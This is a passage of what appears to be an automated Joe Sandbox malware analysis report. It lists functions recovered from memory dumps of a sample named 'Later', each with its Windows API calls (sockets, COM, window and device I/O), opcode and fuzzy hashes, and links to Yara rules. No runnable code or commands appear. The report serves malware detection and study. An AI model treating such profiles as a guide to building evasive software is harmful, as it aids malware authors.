API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 5ed5608380583698d499d0b774ce52bb019d8379255bd855f74e54d4aa1db02e
Instruction ID: f168b53dd42093b93bcc3ad6f28dee2bd68381d8a3cef903162f79c77f0437f0
Opcode Fuzzy Hash: 5ed5608380583698d499d0b774ce52bb019d8379255bd855f74e54d4aa1db02e
Instruction Fuzzy Hash: 7DC15A75A083019FC714DF28C48096ABBE4FF89318F14896EF9999B351D771EA46CB82

Function 00C68545 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00C68575
CoUninitialize.OLE32 ref: 00C68580

Part of subcall function 00C7DC66: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00C687D6,?,00000000), ref: 00C7DCCE

#8.OLEAUT32(?), ref: 00C6858B
#9.WSOCK32(?), ref: 00C6885C

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID:
API String ID: 948891078-0
Opcode ID: 8fdd80cd06da960297b91ada734ceae6bc9e76cdf4aa7e2364acda796eea3c19
Instruction ID: a989d85bebb7a0c923b4069ef96819c99eec6fc616d572900a12077086c180d9
Opcode Fuzzy Hash: 8fdd80cd06da960297b91ada734ceae6bc9e76cdf4aa7e2364acda796eea3c19
Instruction Fuzzy Hash: 72A15A792047059FC720DF54C485B2AB7E4FF88354F148998FA999B3A2CB30ED49CB92

Function 014DC511 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 014DC5D8
___AdjustPointer.LIBCMT ref: 014DC5FB
___AdjustPointer.LIBCMT ref: 014DC697

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 0a6e63002584c44fe614a54a54a28f14c731a7505a19a576430adb121db221cf
Instruction ID: 7cc0d315dd264981a6c0cb0a9ffd83e18550f63cb3746b335324a14f7ad33973
Opcode Fuzzy Hash: 0a6e63002584c44fe614a54a54a28f14c731a7505a19a576430adb121db221cf
Instruction Fuzzy Hash: A551B272A05212AFEF258F59D8E0BBA7BA9EF14610F14452FE919472B0D731F842CB90

Function 00C1485A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C148F0
__flush.LIBCMT ref: 00C14910
__write.LIBCMT ref: 00C14943
__flsbuf.LIBCMT ref: 00C14971

Part of subcall function 00C18C88: __getptd_noexit.LIBCMT ref: 00C18C88

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
Instruction ID: aacc9b064185cffae28bfd688b00964b6846c2de24167c8a77eb3b89017c0d44
Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
Instruction Fuzzy Hash: A641E8716047069BEB1CDEA9C8819EF77AAAF87360F24813DE455C7680D770DEC1A740

Function 014EE358 Relevance: 6.1, APIs: 4, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b0dfa7902cfa80dfd146d3e4e5b782bda634c9d100742b5229143df31da47cb
Instruction ID: 666d479a6a822e4ea5351ce080b6eaf8c447128d419da0f08bc2c5be54eeb301
Opcode Fuzzy Hash: 3b0dfa7902cfa80dfd146d3e4e5b782bda634c9d100742b5229143df31da47cb
Instruction Fuzzy Hash: C54117B2A00705AFD7259F79C808BABBBE8EB58711F10856FE151EB3A0D671D9408790

Function 01410330 Relevance: 6.1, APIs: 4, Instructions: 132COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000002,?,00000000,00000000,00000000,940E2C7A,00000000), ref: 0141037E

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: d77a39e3d1337fc3e6de68c69b878be95c23a3d4a36e97d4df5b0afe97e44539
Instruction ID: 834fced72fddeec20f0799a6a02a3554e9a73c95f2116ffe7b3f329689cafcbc
Opcode Fuzzy Hash: d77a39e3d1337fc3e6de68c69b878be95c23a3d4a36e97d4df5b0afe97e44539
Instruction Fuzzy Hash: 1A41C531A40209AFEB20CF95CC45FAEBBB5FB48710F14452AF211BB2D0C7B0A944CB64

Function 00C4A41B Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00C4A46D
__itow.LIBCMT ref: 00C4A49E

Part of subcall function 00C4A6EE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00C4A759

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00C4A507
__itow.LIBCMT ref: 00C4A55E

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 59c45fc362c4e6cfec870d54a2a72c3e32b89dcb0faccd52a664df65527ea9d2
Instruction ID: 4fd9cca77081a6e1938701656fec9c554192efbf86ca195c5a3e9a857c6da404
Opcode Fuzzy Hash: 59c45fc362c4e6cfec870d54a2a72c3e32b89dcb0faccd52a664df65527ea9d2
Instruction Fuzzy Hash: 7F415B70A40209AFDF11EF64C85ABFEBBB9FF44750F040029F915A7291DB749A44DBA2

Function 00C668CA Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00C80980), ref: 00C66957
_strlen.LIBCMT ref: 00C66989

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 6c239955b5c4dcb47ecab34177d33aec92beb4a389499c85022bb467d9f04074
Instruction ID: 480818b73210fc032a8c30d7e96f5a0fed89f0c527d6df115d0d59e3f25fe7bc
Opcode Fuzzy Hash: 6c239955b5c4dcb47ecab34177d33aec92beb4a389499c85022bb467d9f04074
Instruction Fuzzy Hash: 8041B571A00108AFDB24FBA4DCD2FBEB3A9AF44314F148155F916972D2DB30AE45EB90

Function 00C26325 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C2635B
__isleadbyte_l.LIBCMT ref: 00C26389
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C263B7
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C263ED

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: face444f1a19305b27ccc627da0d1d34ef6f0a124a2d7743d476d12265a3e449
Instruction ID: b4c30c3e61d9dd91023180d2a52918e12c11e5ed9d74e54339f3f25fe2183276
Opcode Fuzzy Hash: face444f1a19305b27ccc627da0d1d34ef6f0a124a2d7743d476d12265a3e449
Instruction Fuzzy Hash: 0931B231600266EFDB25DF65E844BAE7BB5FF41320F154028F864875A0D731D991EBA0

Function 0141036D Relevance: 6.1, APIs: 4, Instructions: 96COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000002,?,00000000,00000000,00000000,940E2C7A,00000000), ref: 0141037E
MultiByteToWideChar.KERNEL32(00000000,00000002,?,00000000,?,?,00000000,00000000,?,00000000,00000000,00000000,940E2C7A,00000000), ref: 014103B7
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000), ref: 014103E1
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000), ref: 01410426

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 8c1d338a6cad6baabc4854fedf35358913cc3f9039dddaf51ccf43d2eade95ba
Instruction ID: 07f7656711a7f981dde5f5a20800b481f6cedb1a6cbc905ad1d38ea36d140364
Opcode Fuzzy Hash: 8c1d338a6cad6baabc4854fedf35358913cc3f9039dddaf51ccf43d2eade95ba
Instruction Fuzzy Hash: 0331A231B40209AFEB24CF94CC45FADBBB6FB48711F24451AE201BB1D0C770A984CB65

Function 00C7C8BB Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BF29F3

GetCursorPos.USER32(?), ref: 00C7C8F5
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00C2BC1C,?,?,?,?,?), ref: 00C7C90A
GetCursorPos.USER32(?), ref: 00C7C957
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00C2BC1C,?,?,?), ref: 00C7C991

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 9653f36139b8049ec6fda7d82021b98ba4f8487ac5747cc93b364933629739c2
Instruction ID: f603f3df35904c88f7cca030fb1bef46b4b29fad8547380a9e35e620e77d3744
Opcode Fuzzy Hash: 9653f36139b8049ec6fda7d82021b98ba4f8487ac5747cc93b364933629739c2
Instruction Fuzzy Hash: 5C31D035600118AFCB558F64D8A8FFE7BB5EB4A310F048169FA198B261C7319E60DFA0

Function 014E68A5 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 678e4971e3ecf474e1575b1e59ccf276091cefa58a134339213896a5ab90cf2b
Instruction ID: 69329c4ded442157d692487833285aab04d9a3cafded8ef7df71ce173b22bd3f
Opcode Fuzzy Hash: 678e4971e3ecf474e1575b1e59ccf276091cefa58a134339213896a5ab90cf2b
Instruction Fuzzy Hash: 67219571600216AFCB21AF66C8889AF77E9BF7026AF12891BF915D7270D730DC00C7A0

Function 00C10AEB Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00C10B0D

Part of subcall function 00C0402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C57CBE,?,?,00000000), ref: 00C04041
Part of subcall function 00C0402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C57CBE,?,?,00000000,?,?), ref: 00C04065

_fprintf.LIBCMT ref: 00C10B44
OutputDebugStringW.KERNEL32(?), ref: 00C4672F

Part of subcall function 00C14BFA: _flsall.LIBCMT ref: 00C14C13

__setmode.LIBCMT ref: 00C10B79

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 7515feb8e9aad4625a327c99d558ac81c80b7ed72b36865b5798aaa8fa825f50
Instruction ID: e5810c2d8806d03f080d965619796c2713fbafee975961af9a7db7997362da4c
Opcode Fuzzy Hash: 7515feb8e9aad4625a327c99d558ac81c80b7ed72b36865b5798aaa8fa825f50
Instruction Fuzzy Hash: 361124729042046BDB08B7A89C42EFE7B699F42324F244165F204A31C2DE605DC6B7A5

Function 014F2D5F Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 014F2D67

Part of subcall function 014F188F: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,014EFC41,?,00000000,-00000008), ref: 014F18F0

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 014F2D9F
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 014F2DBF

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 0a77ff61f02a43c6e0c1b3244dfd7407cc0431501568a62fe9a66d1aa8230a87
Instruction ID: 18cc67a49d3175b5f983193ee361eb5930cb569f8dbbeecc879bc92aa4d194c1
Opcode Fuzzy Hash: 0a77ff61f02a43c6e0c1b3244dfd7407cc0431501568a62fe9a66d1aa8230a87
Instruction Fuzzy Hash: F61104B1902517BFA62267F65CCCCBF69ADEEA8095700002EFA05D5350EEB0DD0252B1

Function 00C76116 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00C76185
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C7619F
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C761AD
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00C761BB

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 39c353e469eef850f1f0392f0d40a08e7ff96cf70b88c63bc676ae179c0cd71e
Instruction ID: 4cfcdeff61f3141afb6f9cd89e584b73ff5fabd84da1b64091eb8f0bf9576af2
Opcode Fuzzy Hash: 39c353e469eef850f1f0392f0d40a08e7ff96cf70b88c63bc676ae179c0cd71e
Instruction Fuzzy Hash: 8A11B135340918AFDB05AB24CC49FBE77A9BF85320F148118FA2AD72D3CB70AD048B94

Function 00C4E23D Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C4F63B: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00C4E252,?,?,?,00C4F045,00000000,000000EF,00000119,?,?), ref: 00C4F64A
Part of subcall function 00C4F63B: lstrcpyW.KERNEL32(00000000,?), ref: 00C4F670
Part of subcall function 00C4F63B: lstrcmpiW.KERNEL32(00000000,?,00C4E252,?,?,?,00C4F045,00000000,000000EF,00000119,?,?), ref: 00C4F6A1

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00C4F045,00000000,000000EF,00000119,?,?,00000000), ref: 00C4E26B
lstrcpyW.KERNEL32(00000000,?), ref: 00C4E291
lstrcmpiW.KERNEL32(00000002,cdecl,?,00C4F045,00000000,000000EF,00000119,?,?,00000000), ref: 00C4E2C5

Strings

cdecl, xrefs: 00C4E2BC

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: b4ad50dd7df6784deb1f2bf1dee1682f626d44bbd26675e8a30f3fe8910220e8
Instruction ID: cca30bf267d3891b2dddd6f46293086eab25347431bae8c3fc2c23a053e625d8
Opcode Fuzzy Hash: b4ad50dd7df6784deb1f2bf1dee1682f626d44bbd26675e8a30f3fe8910220e8
Instruction Fuzzy Hash: 9411D036200305AFDB25AF64D845EBA77A8FF45310B51402AF806CB2A0EBB19952D7A4

Function 00C541D2 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00C541F2
_memset.LIBCMT ref: 00C54213
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00C54265
CloseHandle.KERNEL32(00000000), ref: 00C5426E

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: eeeb3b928dd80a85fc5b9d2cc56ce7a6244e61685bdd06af6acc64d950541c26
Instruction ID: 7e98bc434943c83a9b67e32718d94ab8fcde7ac8ceb3ae5250e81ffc02141185
Opcode Fuzzy Hash: eeeb3b928dd80a85fc5b9d2cc56ce7a6244e61685bdd06af6acc64d950541c26
Instruction Fuzzy Hash: B811C4759012287AD7309BA5AC4DFAFBB7CEF45720F10429AF918A7190D2704EC48BA8

Function 00C66819 Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 00C0402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C57CBE,?,?,00000000), ref: 00C04041
Part of subcall function 00C0402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C57CBE,?,?,00000000,?,?), ref: 00C04065

#52.WSOCK32(?,?,?), ref: 00C66849
#111.WSOCK32(00000000), ref: 00C66854
_memmove.LIBCMT ref: 00C66881
#11.WSOCK32(?), ref: 00C6688C

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: ByteCharMultiWide$#111_memmove
String ID:
API String ID: 70051993-0
Opcode ID: 7a49fbdc6032ea3e5b68de7419d210de4abf51382e63175d724979dfaa3aeca8
Instruction ID: dd3570eda8b08731b26c6f049f0788156e3b083dd393c9eba93e0a8a213a3169
Opcode Fuzzy Hash: 7a49fbdc6032ea3e5b68de7419d210de4abf51382e63175d724979dfaa3aeca8
Instruction Fuzzy Hash: 64115176500109AFCB14EBA4DD86DEEB7B8EF08310B144065F605A72A2DF31AE58EB51

Function 00BF2111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BF214F
GetStockObject.GDI32(00000011), ref: 00BF2163
SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF216D

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 9da3552a24d64b8bdd9ee2245816c3f683caec45063f5bf16fee416119ef2efe
Instruction ID: 9c2280129dc5db917f6e8ca128de4d855fdb0edf606f03b23677c99a2caf01e1
Opcode Fuzzy Hash: 9da3552a24d64b8bdd9ee2245816c3f683caec45063f5bf16fee416119ef2efe
Instruction Fuzzy Hash: 37118B7250110DBFDB024F90DC84FEA7BA9EF58364F140145FB0462050C7319D64EBA4

Function 00C7C13F Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00BF16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BF1729
Part of subcall function 00BF16CF: SelectObject.GDI32(?,00000000), ref: 00BF1738
